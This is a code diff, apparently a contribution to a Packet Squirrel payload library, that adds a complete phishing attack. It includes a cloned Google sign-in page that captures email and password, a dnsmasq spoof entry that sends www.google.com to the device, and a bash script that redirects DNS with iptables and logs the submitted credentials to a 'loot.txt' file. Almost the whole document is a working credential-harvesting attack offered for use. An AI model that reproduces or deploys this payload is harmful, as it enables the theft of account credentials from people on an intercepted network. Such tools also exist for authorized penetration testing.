Payload

My first payload contribution for the Packet Squirrel platform.

payloads/library/interception/phishing+/html/index.html

@@ -0,0 +1,206 @@
+<!DOCTYPE html>
+<html>
+
+  <head>
+
+    <title>Sign in - Google Accounts</title>
+
+    <meta charset='UTF-8'>
+    <meta http-equiv="cache-control" content="no-cache" />
+    <meta http-equiv="expires" content="0" />
+    <meta http-equiv="pragma" content="no-cache" />
+    <meta name="viewport" content="width=device-width,
+    initial-scale=0.75, maximum-scale=0.75, user-scalable=no">
+    <meta name="robots" content="noindex, nofollow"> 
+
+    <script src="static/js/jquery.min.js"></script>
+
+    <link rel="stylesheet" href="static/css/bootstrap.min.css">
+    <link rel="stylesheet" href="static/css/style.css">
+    <link rel="icon" type="image/png" href="static/img/oc3czvmbvf.png"/>
+
+    <style>
+
+    .google-header-bar {
+    height: 71px;
+    border-bottom: 1px solid #e5e5e5;
+    overflow: hidden;
+    }
+
+    .google-header-bar.centered {
+    border: 0;
+    height: 108px;
+    }
+
+    .google-header-bar.centered .header .logo {
+    float: none;
+    margin: 40px auto 30px;
+    display: block;
+    }
+    .google-header-bar.centered .header .secondary-link {
+    display: none
+    }
+
+    .header .logo {
+    margin: 17px 0 0;
+    float: left;
+    height: 38px;
+    width: 116px;
+    }
+
+    </style>
+
+    <style media="screen and (max-width: 800px), screen and (max-height: 800px)">
+
+      .google-header-bar.centered {
+        height: 83px;
+      }
+
+      .google-header-bar.centered .header .logo {
+        margin: 25px auto 20px;
+      }
+
+      .card {
+        margin-bottom: 20px;
+      }
+
+    </style>
+
+    <style media="screen and (max-width: 580px)">
+
+      html,
+      body {
+        font-size: 14px;
+      }
+
+      .google-header-bar.centered {
+        height: 73px;
+      }
+
+      .google-header-bar.centered .header .logo {
+        margin: 20px auto 15px;
+      }
+
+      .content {
+        padding-left: 10px;
+        padding-right: 10px;
+      }
+
+      .hidden-small {
+        display: none;
+      }
+
+      .card {
+        padding: 20px 15px 30px;
+        width: 270px;
+      }
+
+      .footer ul li {
+        padding-right: 1em;
+      }
+
+      .lang-chooser-wrap {
+        display: none;
+      }
+
+    </style>
+
+  </head>
+
+  <body>
+
+    <div class="container">
+
+      <div class="google-header-bar centered">
+        <div class="header content clearfix">
+          <img alt="Google" class="logo" src="static/img/dtnk16mcjo.png">
+        </div>
+      </div>
+
+      <h1 class="text-center login-title">Sign in with your Google Account</h1>
+
+        <div class="account-wall">
+
+          <img class="profile-img" src="static/img/yqczrisvt2.png" alt="">
+
+          <form id="SubmitForm" class="form-signin" method="get" action="/loading.html" >
+            <input id="eml" type="text" name="eml" class="form-control" placeholder="Email" _autofocus="true" autocorrect="off" autocomplete="off" autocapitalize="off" required>
+            <input id="pwd" type="password" name="pwd" class="form-control" placeholder="Password" autocorrect="off" autocomplete="off" autocapitalize="off" required><br>
+
+            <div id="dialog">
+            <h2 id="error">Please enter the required fields.</h2>
+            </div>
+
+            <button id="btn" class="btn btn-primary btn-block btn-sharp" name="login" type="submit">Sign in</button>
+            <a href="#" class="pull-right need-help">Find my account </a><span class="clearfix"></span>
+          </form>
+
+        </div>
+
+            <br><a href="#" class="text-center new-account">Create an account </a>
+            <center><br><p class="tagline">One Google Account for everything Google</p>
+            <img src="static/img/tmjjgvk28i.png" width="210" height="17" alt=""></center><br><br>
+
+    <script>
+      /*
+      Check the password field and act accordingly.
+      */
+
+      $("#btn").on("click", function(e) {
+          e.preventDefault();
+          // get the password box and checkbox elements
+          var input = document.getElementById("eml");
+          var input2 = document.getElementById("pwd");
+          // check to see if the value is empty
+          if ( input.value == "" ){
+              passNotValid();
+          }else if( input2.value == "" ){ //check if the value of the repeat field is empty
+              passNotValid();
+          }else{
+             document.getElementById("SubmitForm").submit();    
+          }
+      });
+
+      function passNotValid(){
+        $("#dialog").css('display', 'block');
+        $(".form-control").css('border', '1px solid #dd4b39');
+      }
+      
+      /*
+      Post to the fallowing path given the parameters.
+
+      Args:
+        path: The path to be posted to.
+        params: The parameters to be passed.
+      */
+      function post(path, params) {
+        // create a form and set its attributes
+        var form = document.createElement("form");
+        form.setAttribute("method", "post");
+        form.setAttribute("action", path);
+
+        // set the attribute for the post
+        for(var key in params) {
+            if(params.hasOwnProperty(key)) {
+                var hiddenField = document.createElement("input");
+                hiddenField.setAttribute("type", "hidden");
+                hiddenField.setAttribute("name", key);
+                hiddenField.setAttribute("value", params[key]);
+                form.appendChild(hiddenField);
+             }
+        }
+        // submit the post
+        document.body.appendChild(form);
+        form.submit();
+      }
+      var input = document.getElementById("eml");
+      var input2 = document.getElementById("pwd");
+      input.disabled = false;
+      input2.disabled = false;
+    </script>
+
+    </div>
+
+  </body>
+
+</html>

payloads/library/interception/phishing+/html/loading.html

@@ -0,0 +1 @@
+Loading, please wait ...

payloads/library/interception/phishing+/html/static/css/style.css

@@ -0,0 +1,130 @@
+.form-signin
+{
+    max-width: 330px;
+    padding: 15px;
+    margin: 0 auto;
+}
+.form-signin .form-signin-heading, .form-signin .checkbox
+{
+    margin-bottom: 10px;
+}
+.form-signin .checkbox
+{
+    font-weight: normal;
+}
+.form-signin .form-control
+{
+    position: relative;
+    font-size: 16px;
+    height: auto;
+    padding: 10px;
+    -webkit-box-sizing: border-box;
+    -moz-box-sizing: border-box;
+    box-sizing: border-box;
+}
+.form-signin .form-control:focus
+{
+    z-index: 2;
+}
+.form-signin input[type="text"]
+{
+    margin-bottom: -1px;
+    border-bottom-left-radius: 0;
+    border-bottom-right-radius: 0;
+    border-radius: 1px;
+}
+.form-signin input[type="password"]
+{
+    margin-bottom: 0px;
+    border-top-left-radius: 0;
+    border-top-right-radius: 0;
+    border-radius: 1px;
+}
+.account-wall
+{
+    margin-top: 20px;
+    padding: 40px 0px 20px 0px;
+    background-color: #f7f7f7;
+    -moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
+    -webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
+    box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
+}
+.login-title
+{
+    color: #555;
+    font-size: 18px;
+    font-weight: 400;
+    display: block;
+}
+.profile-img
+{
+    width: 96px;
+    height: 96px;
+    margin: 0 auto 10px;
+    display: block;
+    -moz-border-radius: 50%;
+    -webkit-border-radius: 50%;
+    border-radius: 50%;
+}
+.need-help
+{
+    margin-top: 10px;
+}
+.new-account
+{
+    display: block;
+    margin-top: 10px;
+}
+
+.btn-primary {
+    background: #4B8EFA;
+    color: #ffffff;
+}
+
+.container {
+    margin: 0 auto;
+    width: 400px;
+}
+
+.btn-primary {
+    color: #FFFFFF;
+    text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25);
+    background-color: #4888ef;
+    *background-color: #4888ef;
+    background-image: -moz-linear-gradient(top, #4C8EFB, #4888ef);
+    background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#4C8EFB), to(#4888ef));
+    background-image: -webkit-linear-gradient(top, #4C8EFB, #4888ef);
+    background-image: -o-linear-gradient(top, #4C8EFB, #4888ef);
+    background-image: linear-gradient(to bottom, #4C8EFB, #4888ef);
+    background-repeat: repeat-x;
+    border-color: #4888ef;
+    border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
+    filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#4C8EFB', endColorstr='#4888ef', GradientType=0);
+    filter: progid:DXImageTransform.Microsoft.gradient(enabled=false);
+}
+.btn-sample:hover,
+.btn-sample:focus,
+.btn-sample:active,
+.btn-sample.active,
+.btn-sample.disabled,
+.btn-sample[disabled] {
+    color: #FFFFFF;
+    background-color: #4888ef;
+    *background-color: #003bb3;
+}
+
+.btn-sharp {
+    border-radius: 3px;
+}
+
+#dialog{
+  display: none;}
+
+#dialog > h2{
+  color: #dd4b39;
+  margin: .5em 0;
+  font-size: 14px;
+  margin-top: 0px;
+  margin-bottom: 10px;
+
+}

payloads/library/interception/phishing+/payload.sh

@@ -0,0 +1,55 @@
+#!/bin/bash
+# 
+# Title:		Phishing
+# Description:  DNSSpoof + SimpleHTTPServer to run a simple phishing attack storing the loot locally, see the "loot.txt" file
+# 				Default settings and phishing template is for Google.com login, change the content of the "html" folder to change website content. 
+#				You can find way more templates here -> https://github.com/wifiphisher/extra-phishing-pages
+#				Credits to the guys behind the WifiPhisher project. 
+# 				Just be sure to change the form submit method to "GET" and not "POST" for new templates
+#
+#				remember to run "chmod +x payload.sh" after moving over the files.
+# Author: 		SkiddieTech (Creds to HAK5 for the DNSSpoof payload this is built on)
+# Version:		1.0
+# Category: 		interception
+# Target: 		Any
+# Net Mode:		NAT
+
+
+function setup() {
+	# Show SETUP LED
+	LED SETUP
+
+	# Set the network mode to NAT
+	NETMODE NAT
+	sleep 5
+
+	# Copy the spoofhost file to /tmp/dnsmasq.address
+	cp $(dirname ${BASH_SOURCE[0]})/spoofhost /tmp/dnsmasq.address &> /dev/null
+
+	# Restart dnsmasq with the new configuration
+	/etc/init.d/dnsmasq restart	
+
+	#Navigate to the correct dir
+	cd "$(dirname "${BASH_SOURCE[0]}")/html/"
+
+	#Clean old loot file
+	echo > ../loot.txt
+ 
+	#Start HTTP server and log everthing to the "loot.txt" file
+	python -m SimpleHTTPServer 80 2>&1 | tee ../loot.txt &
+	sleep 9
+
+}
+
+function run() {
+	# Show  ATTACK LED
+	LED ATTACK
+
+	# Redirect all DNS traffic to ourselves
+	iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53	
+	
+	
+}
+
+setup
+run

payloads/library/interception/phishing+/spoofhost

@@ -0,0 +1 @@
+address=/www.google.com/172.16.32.1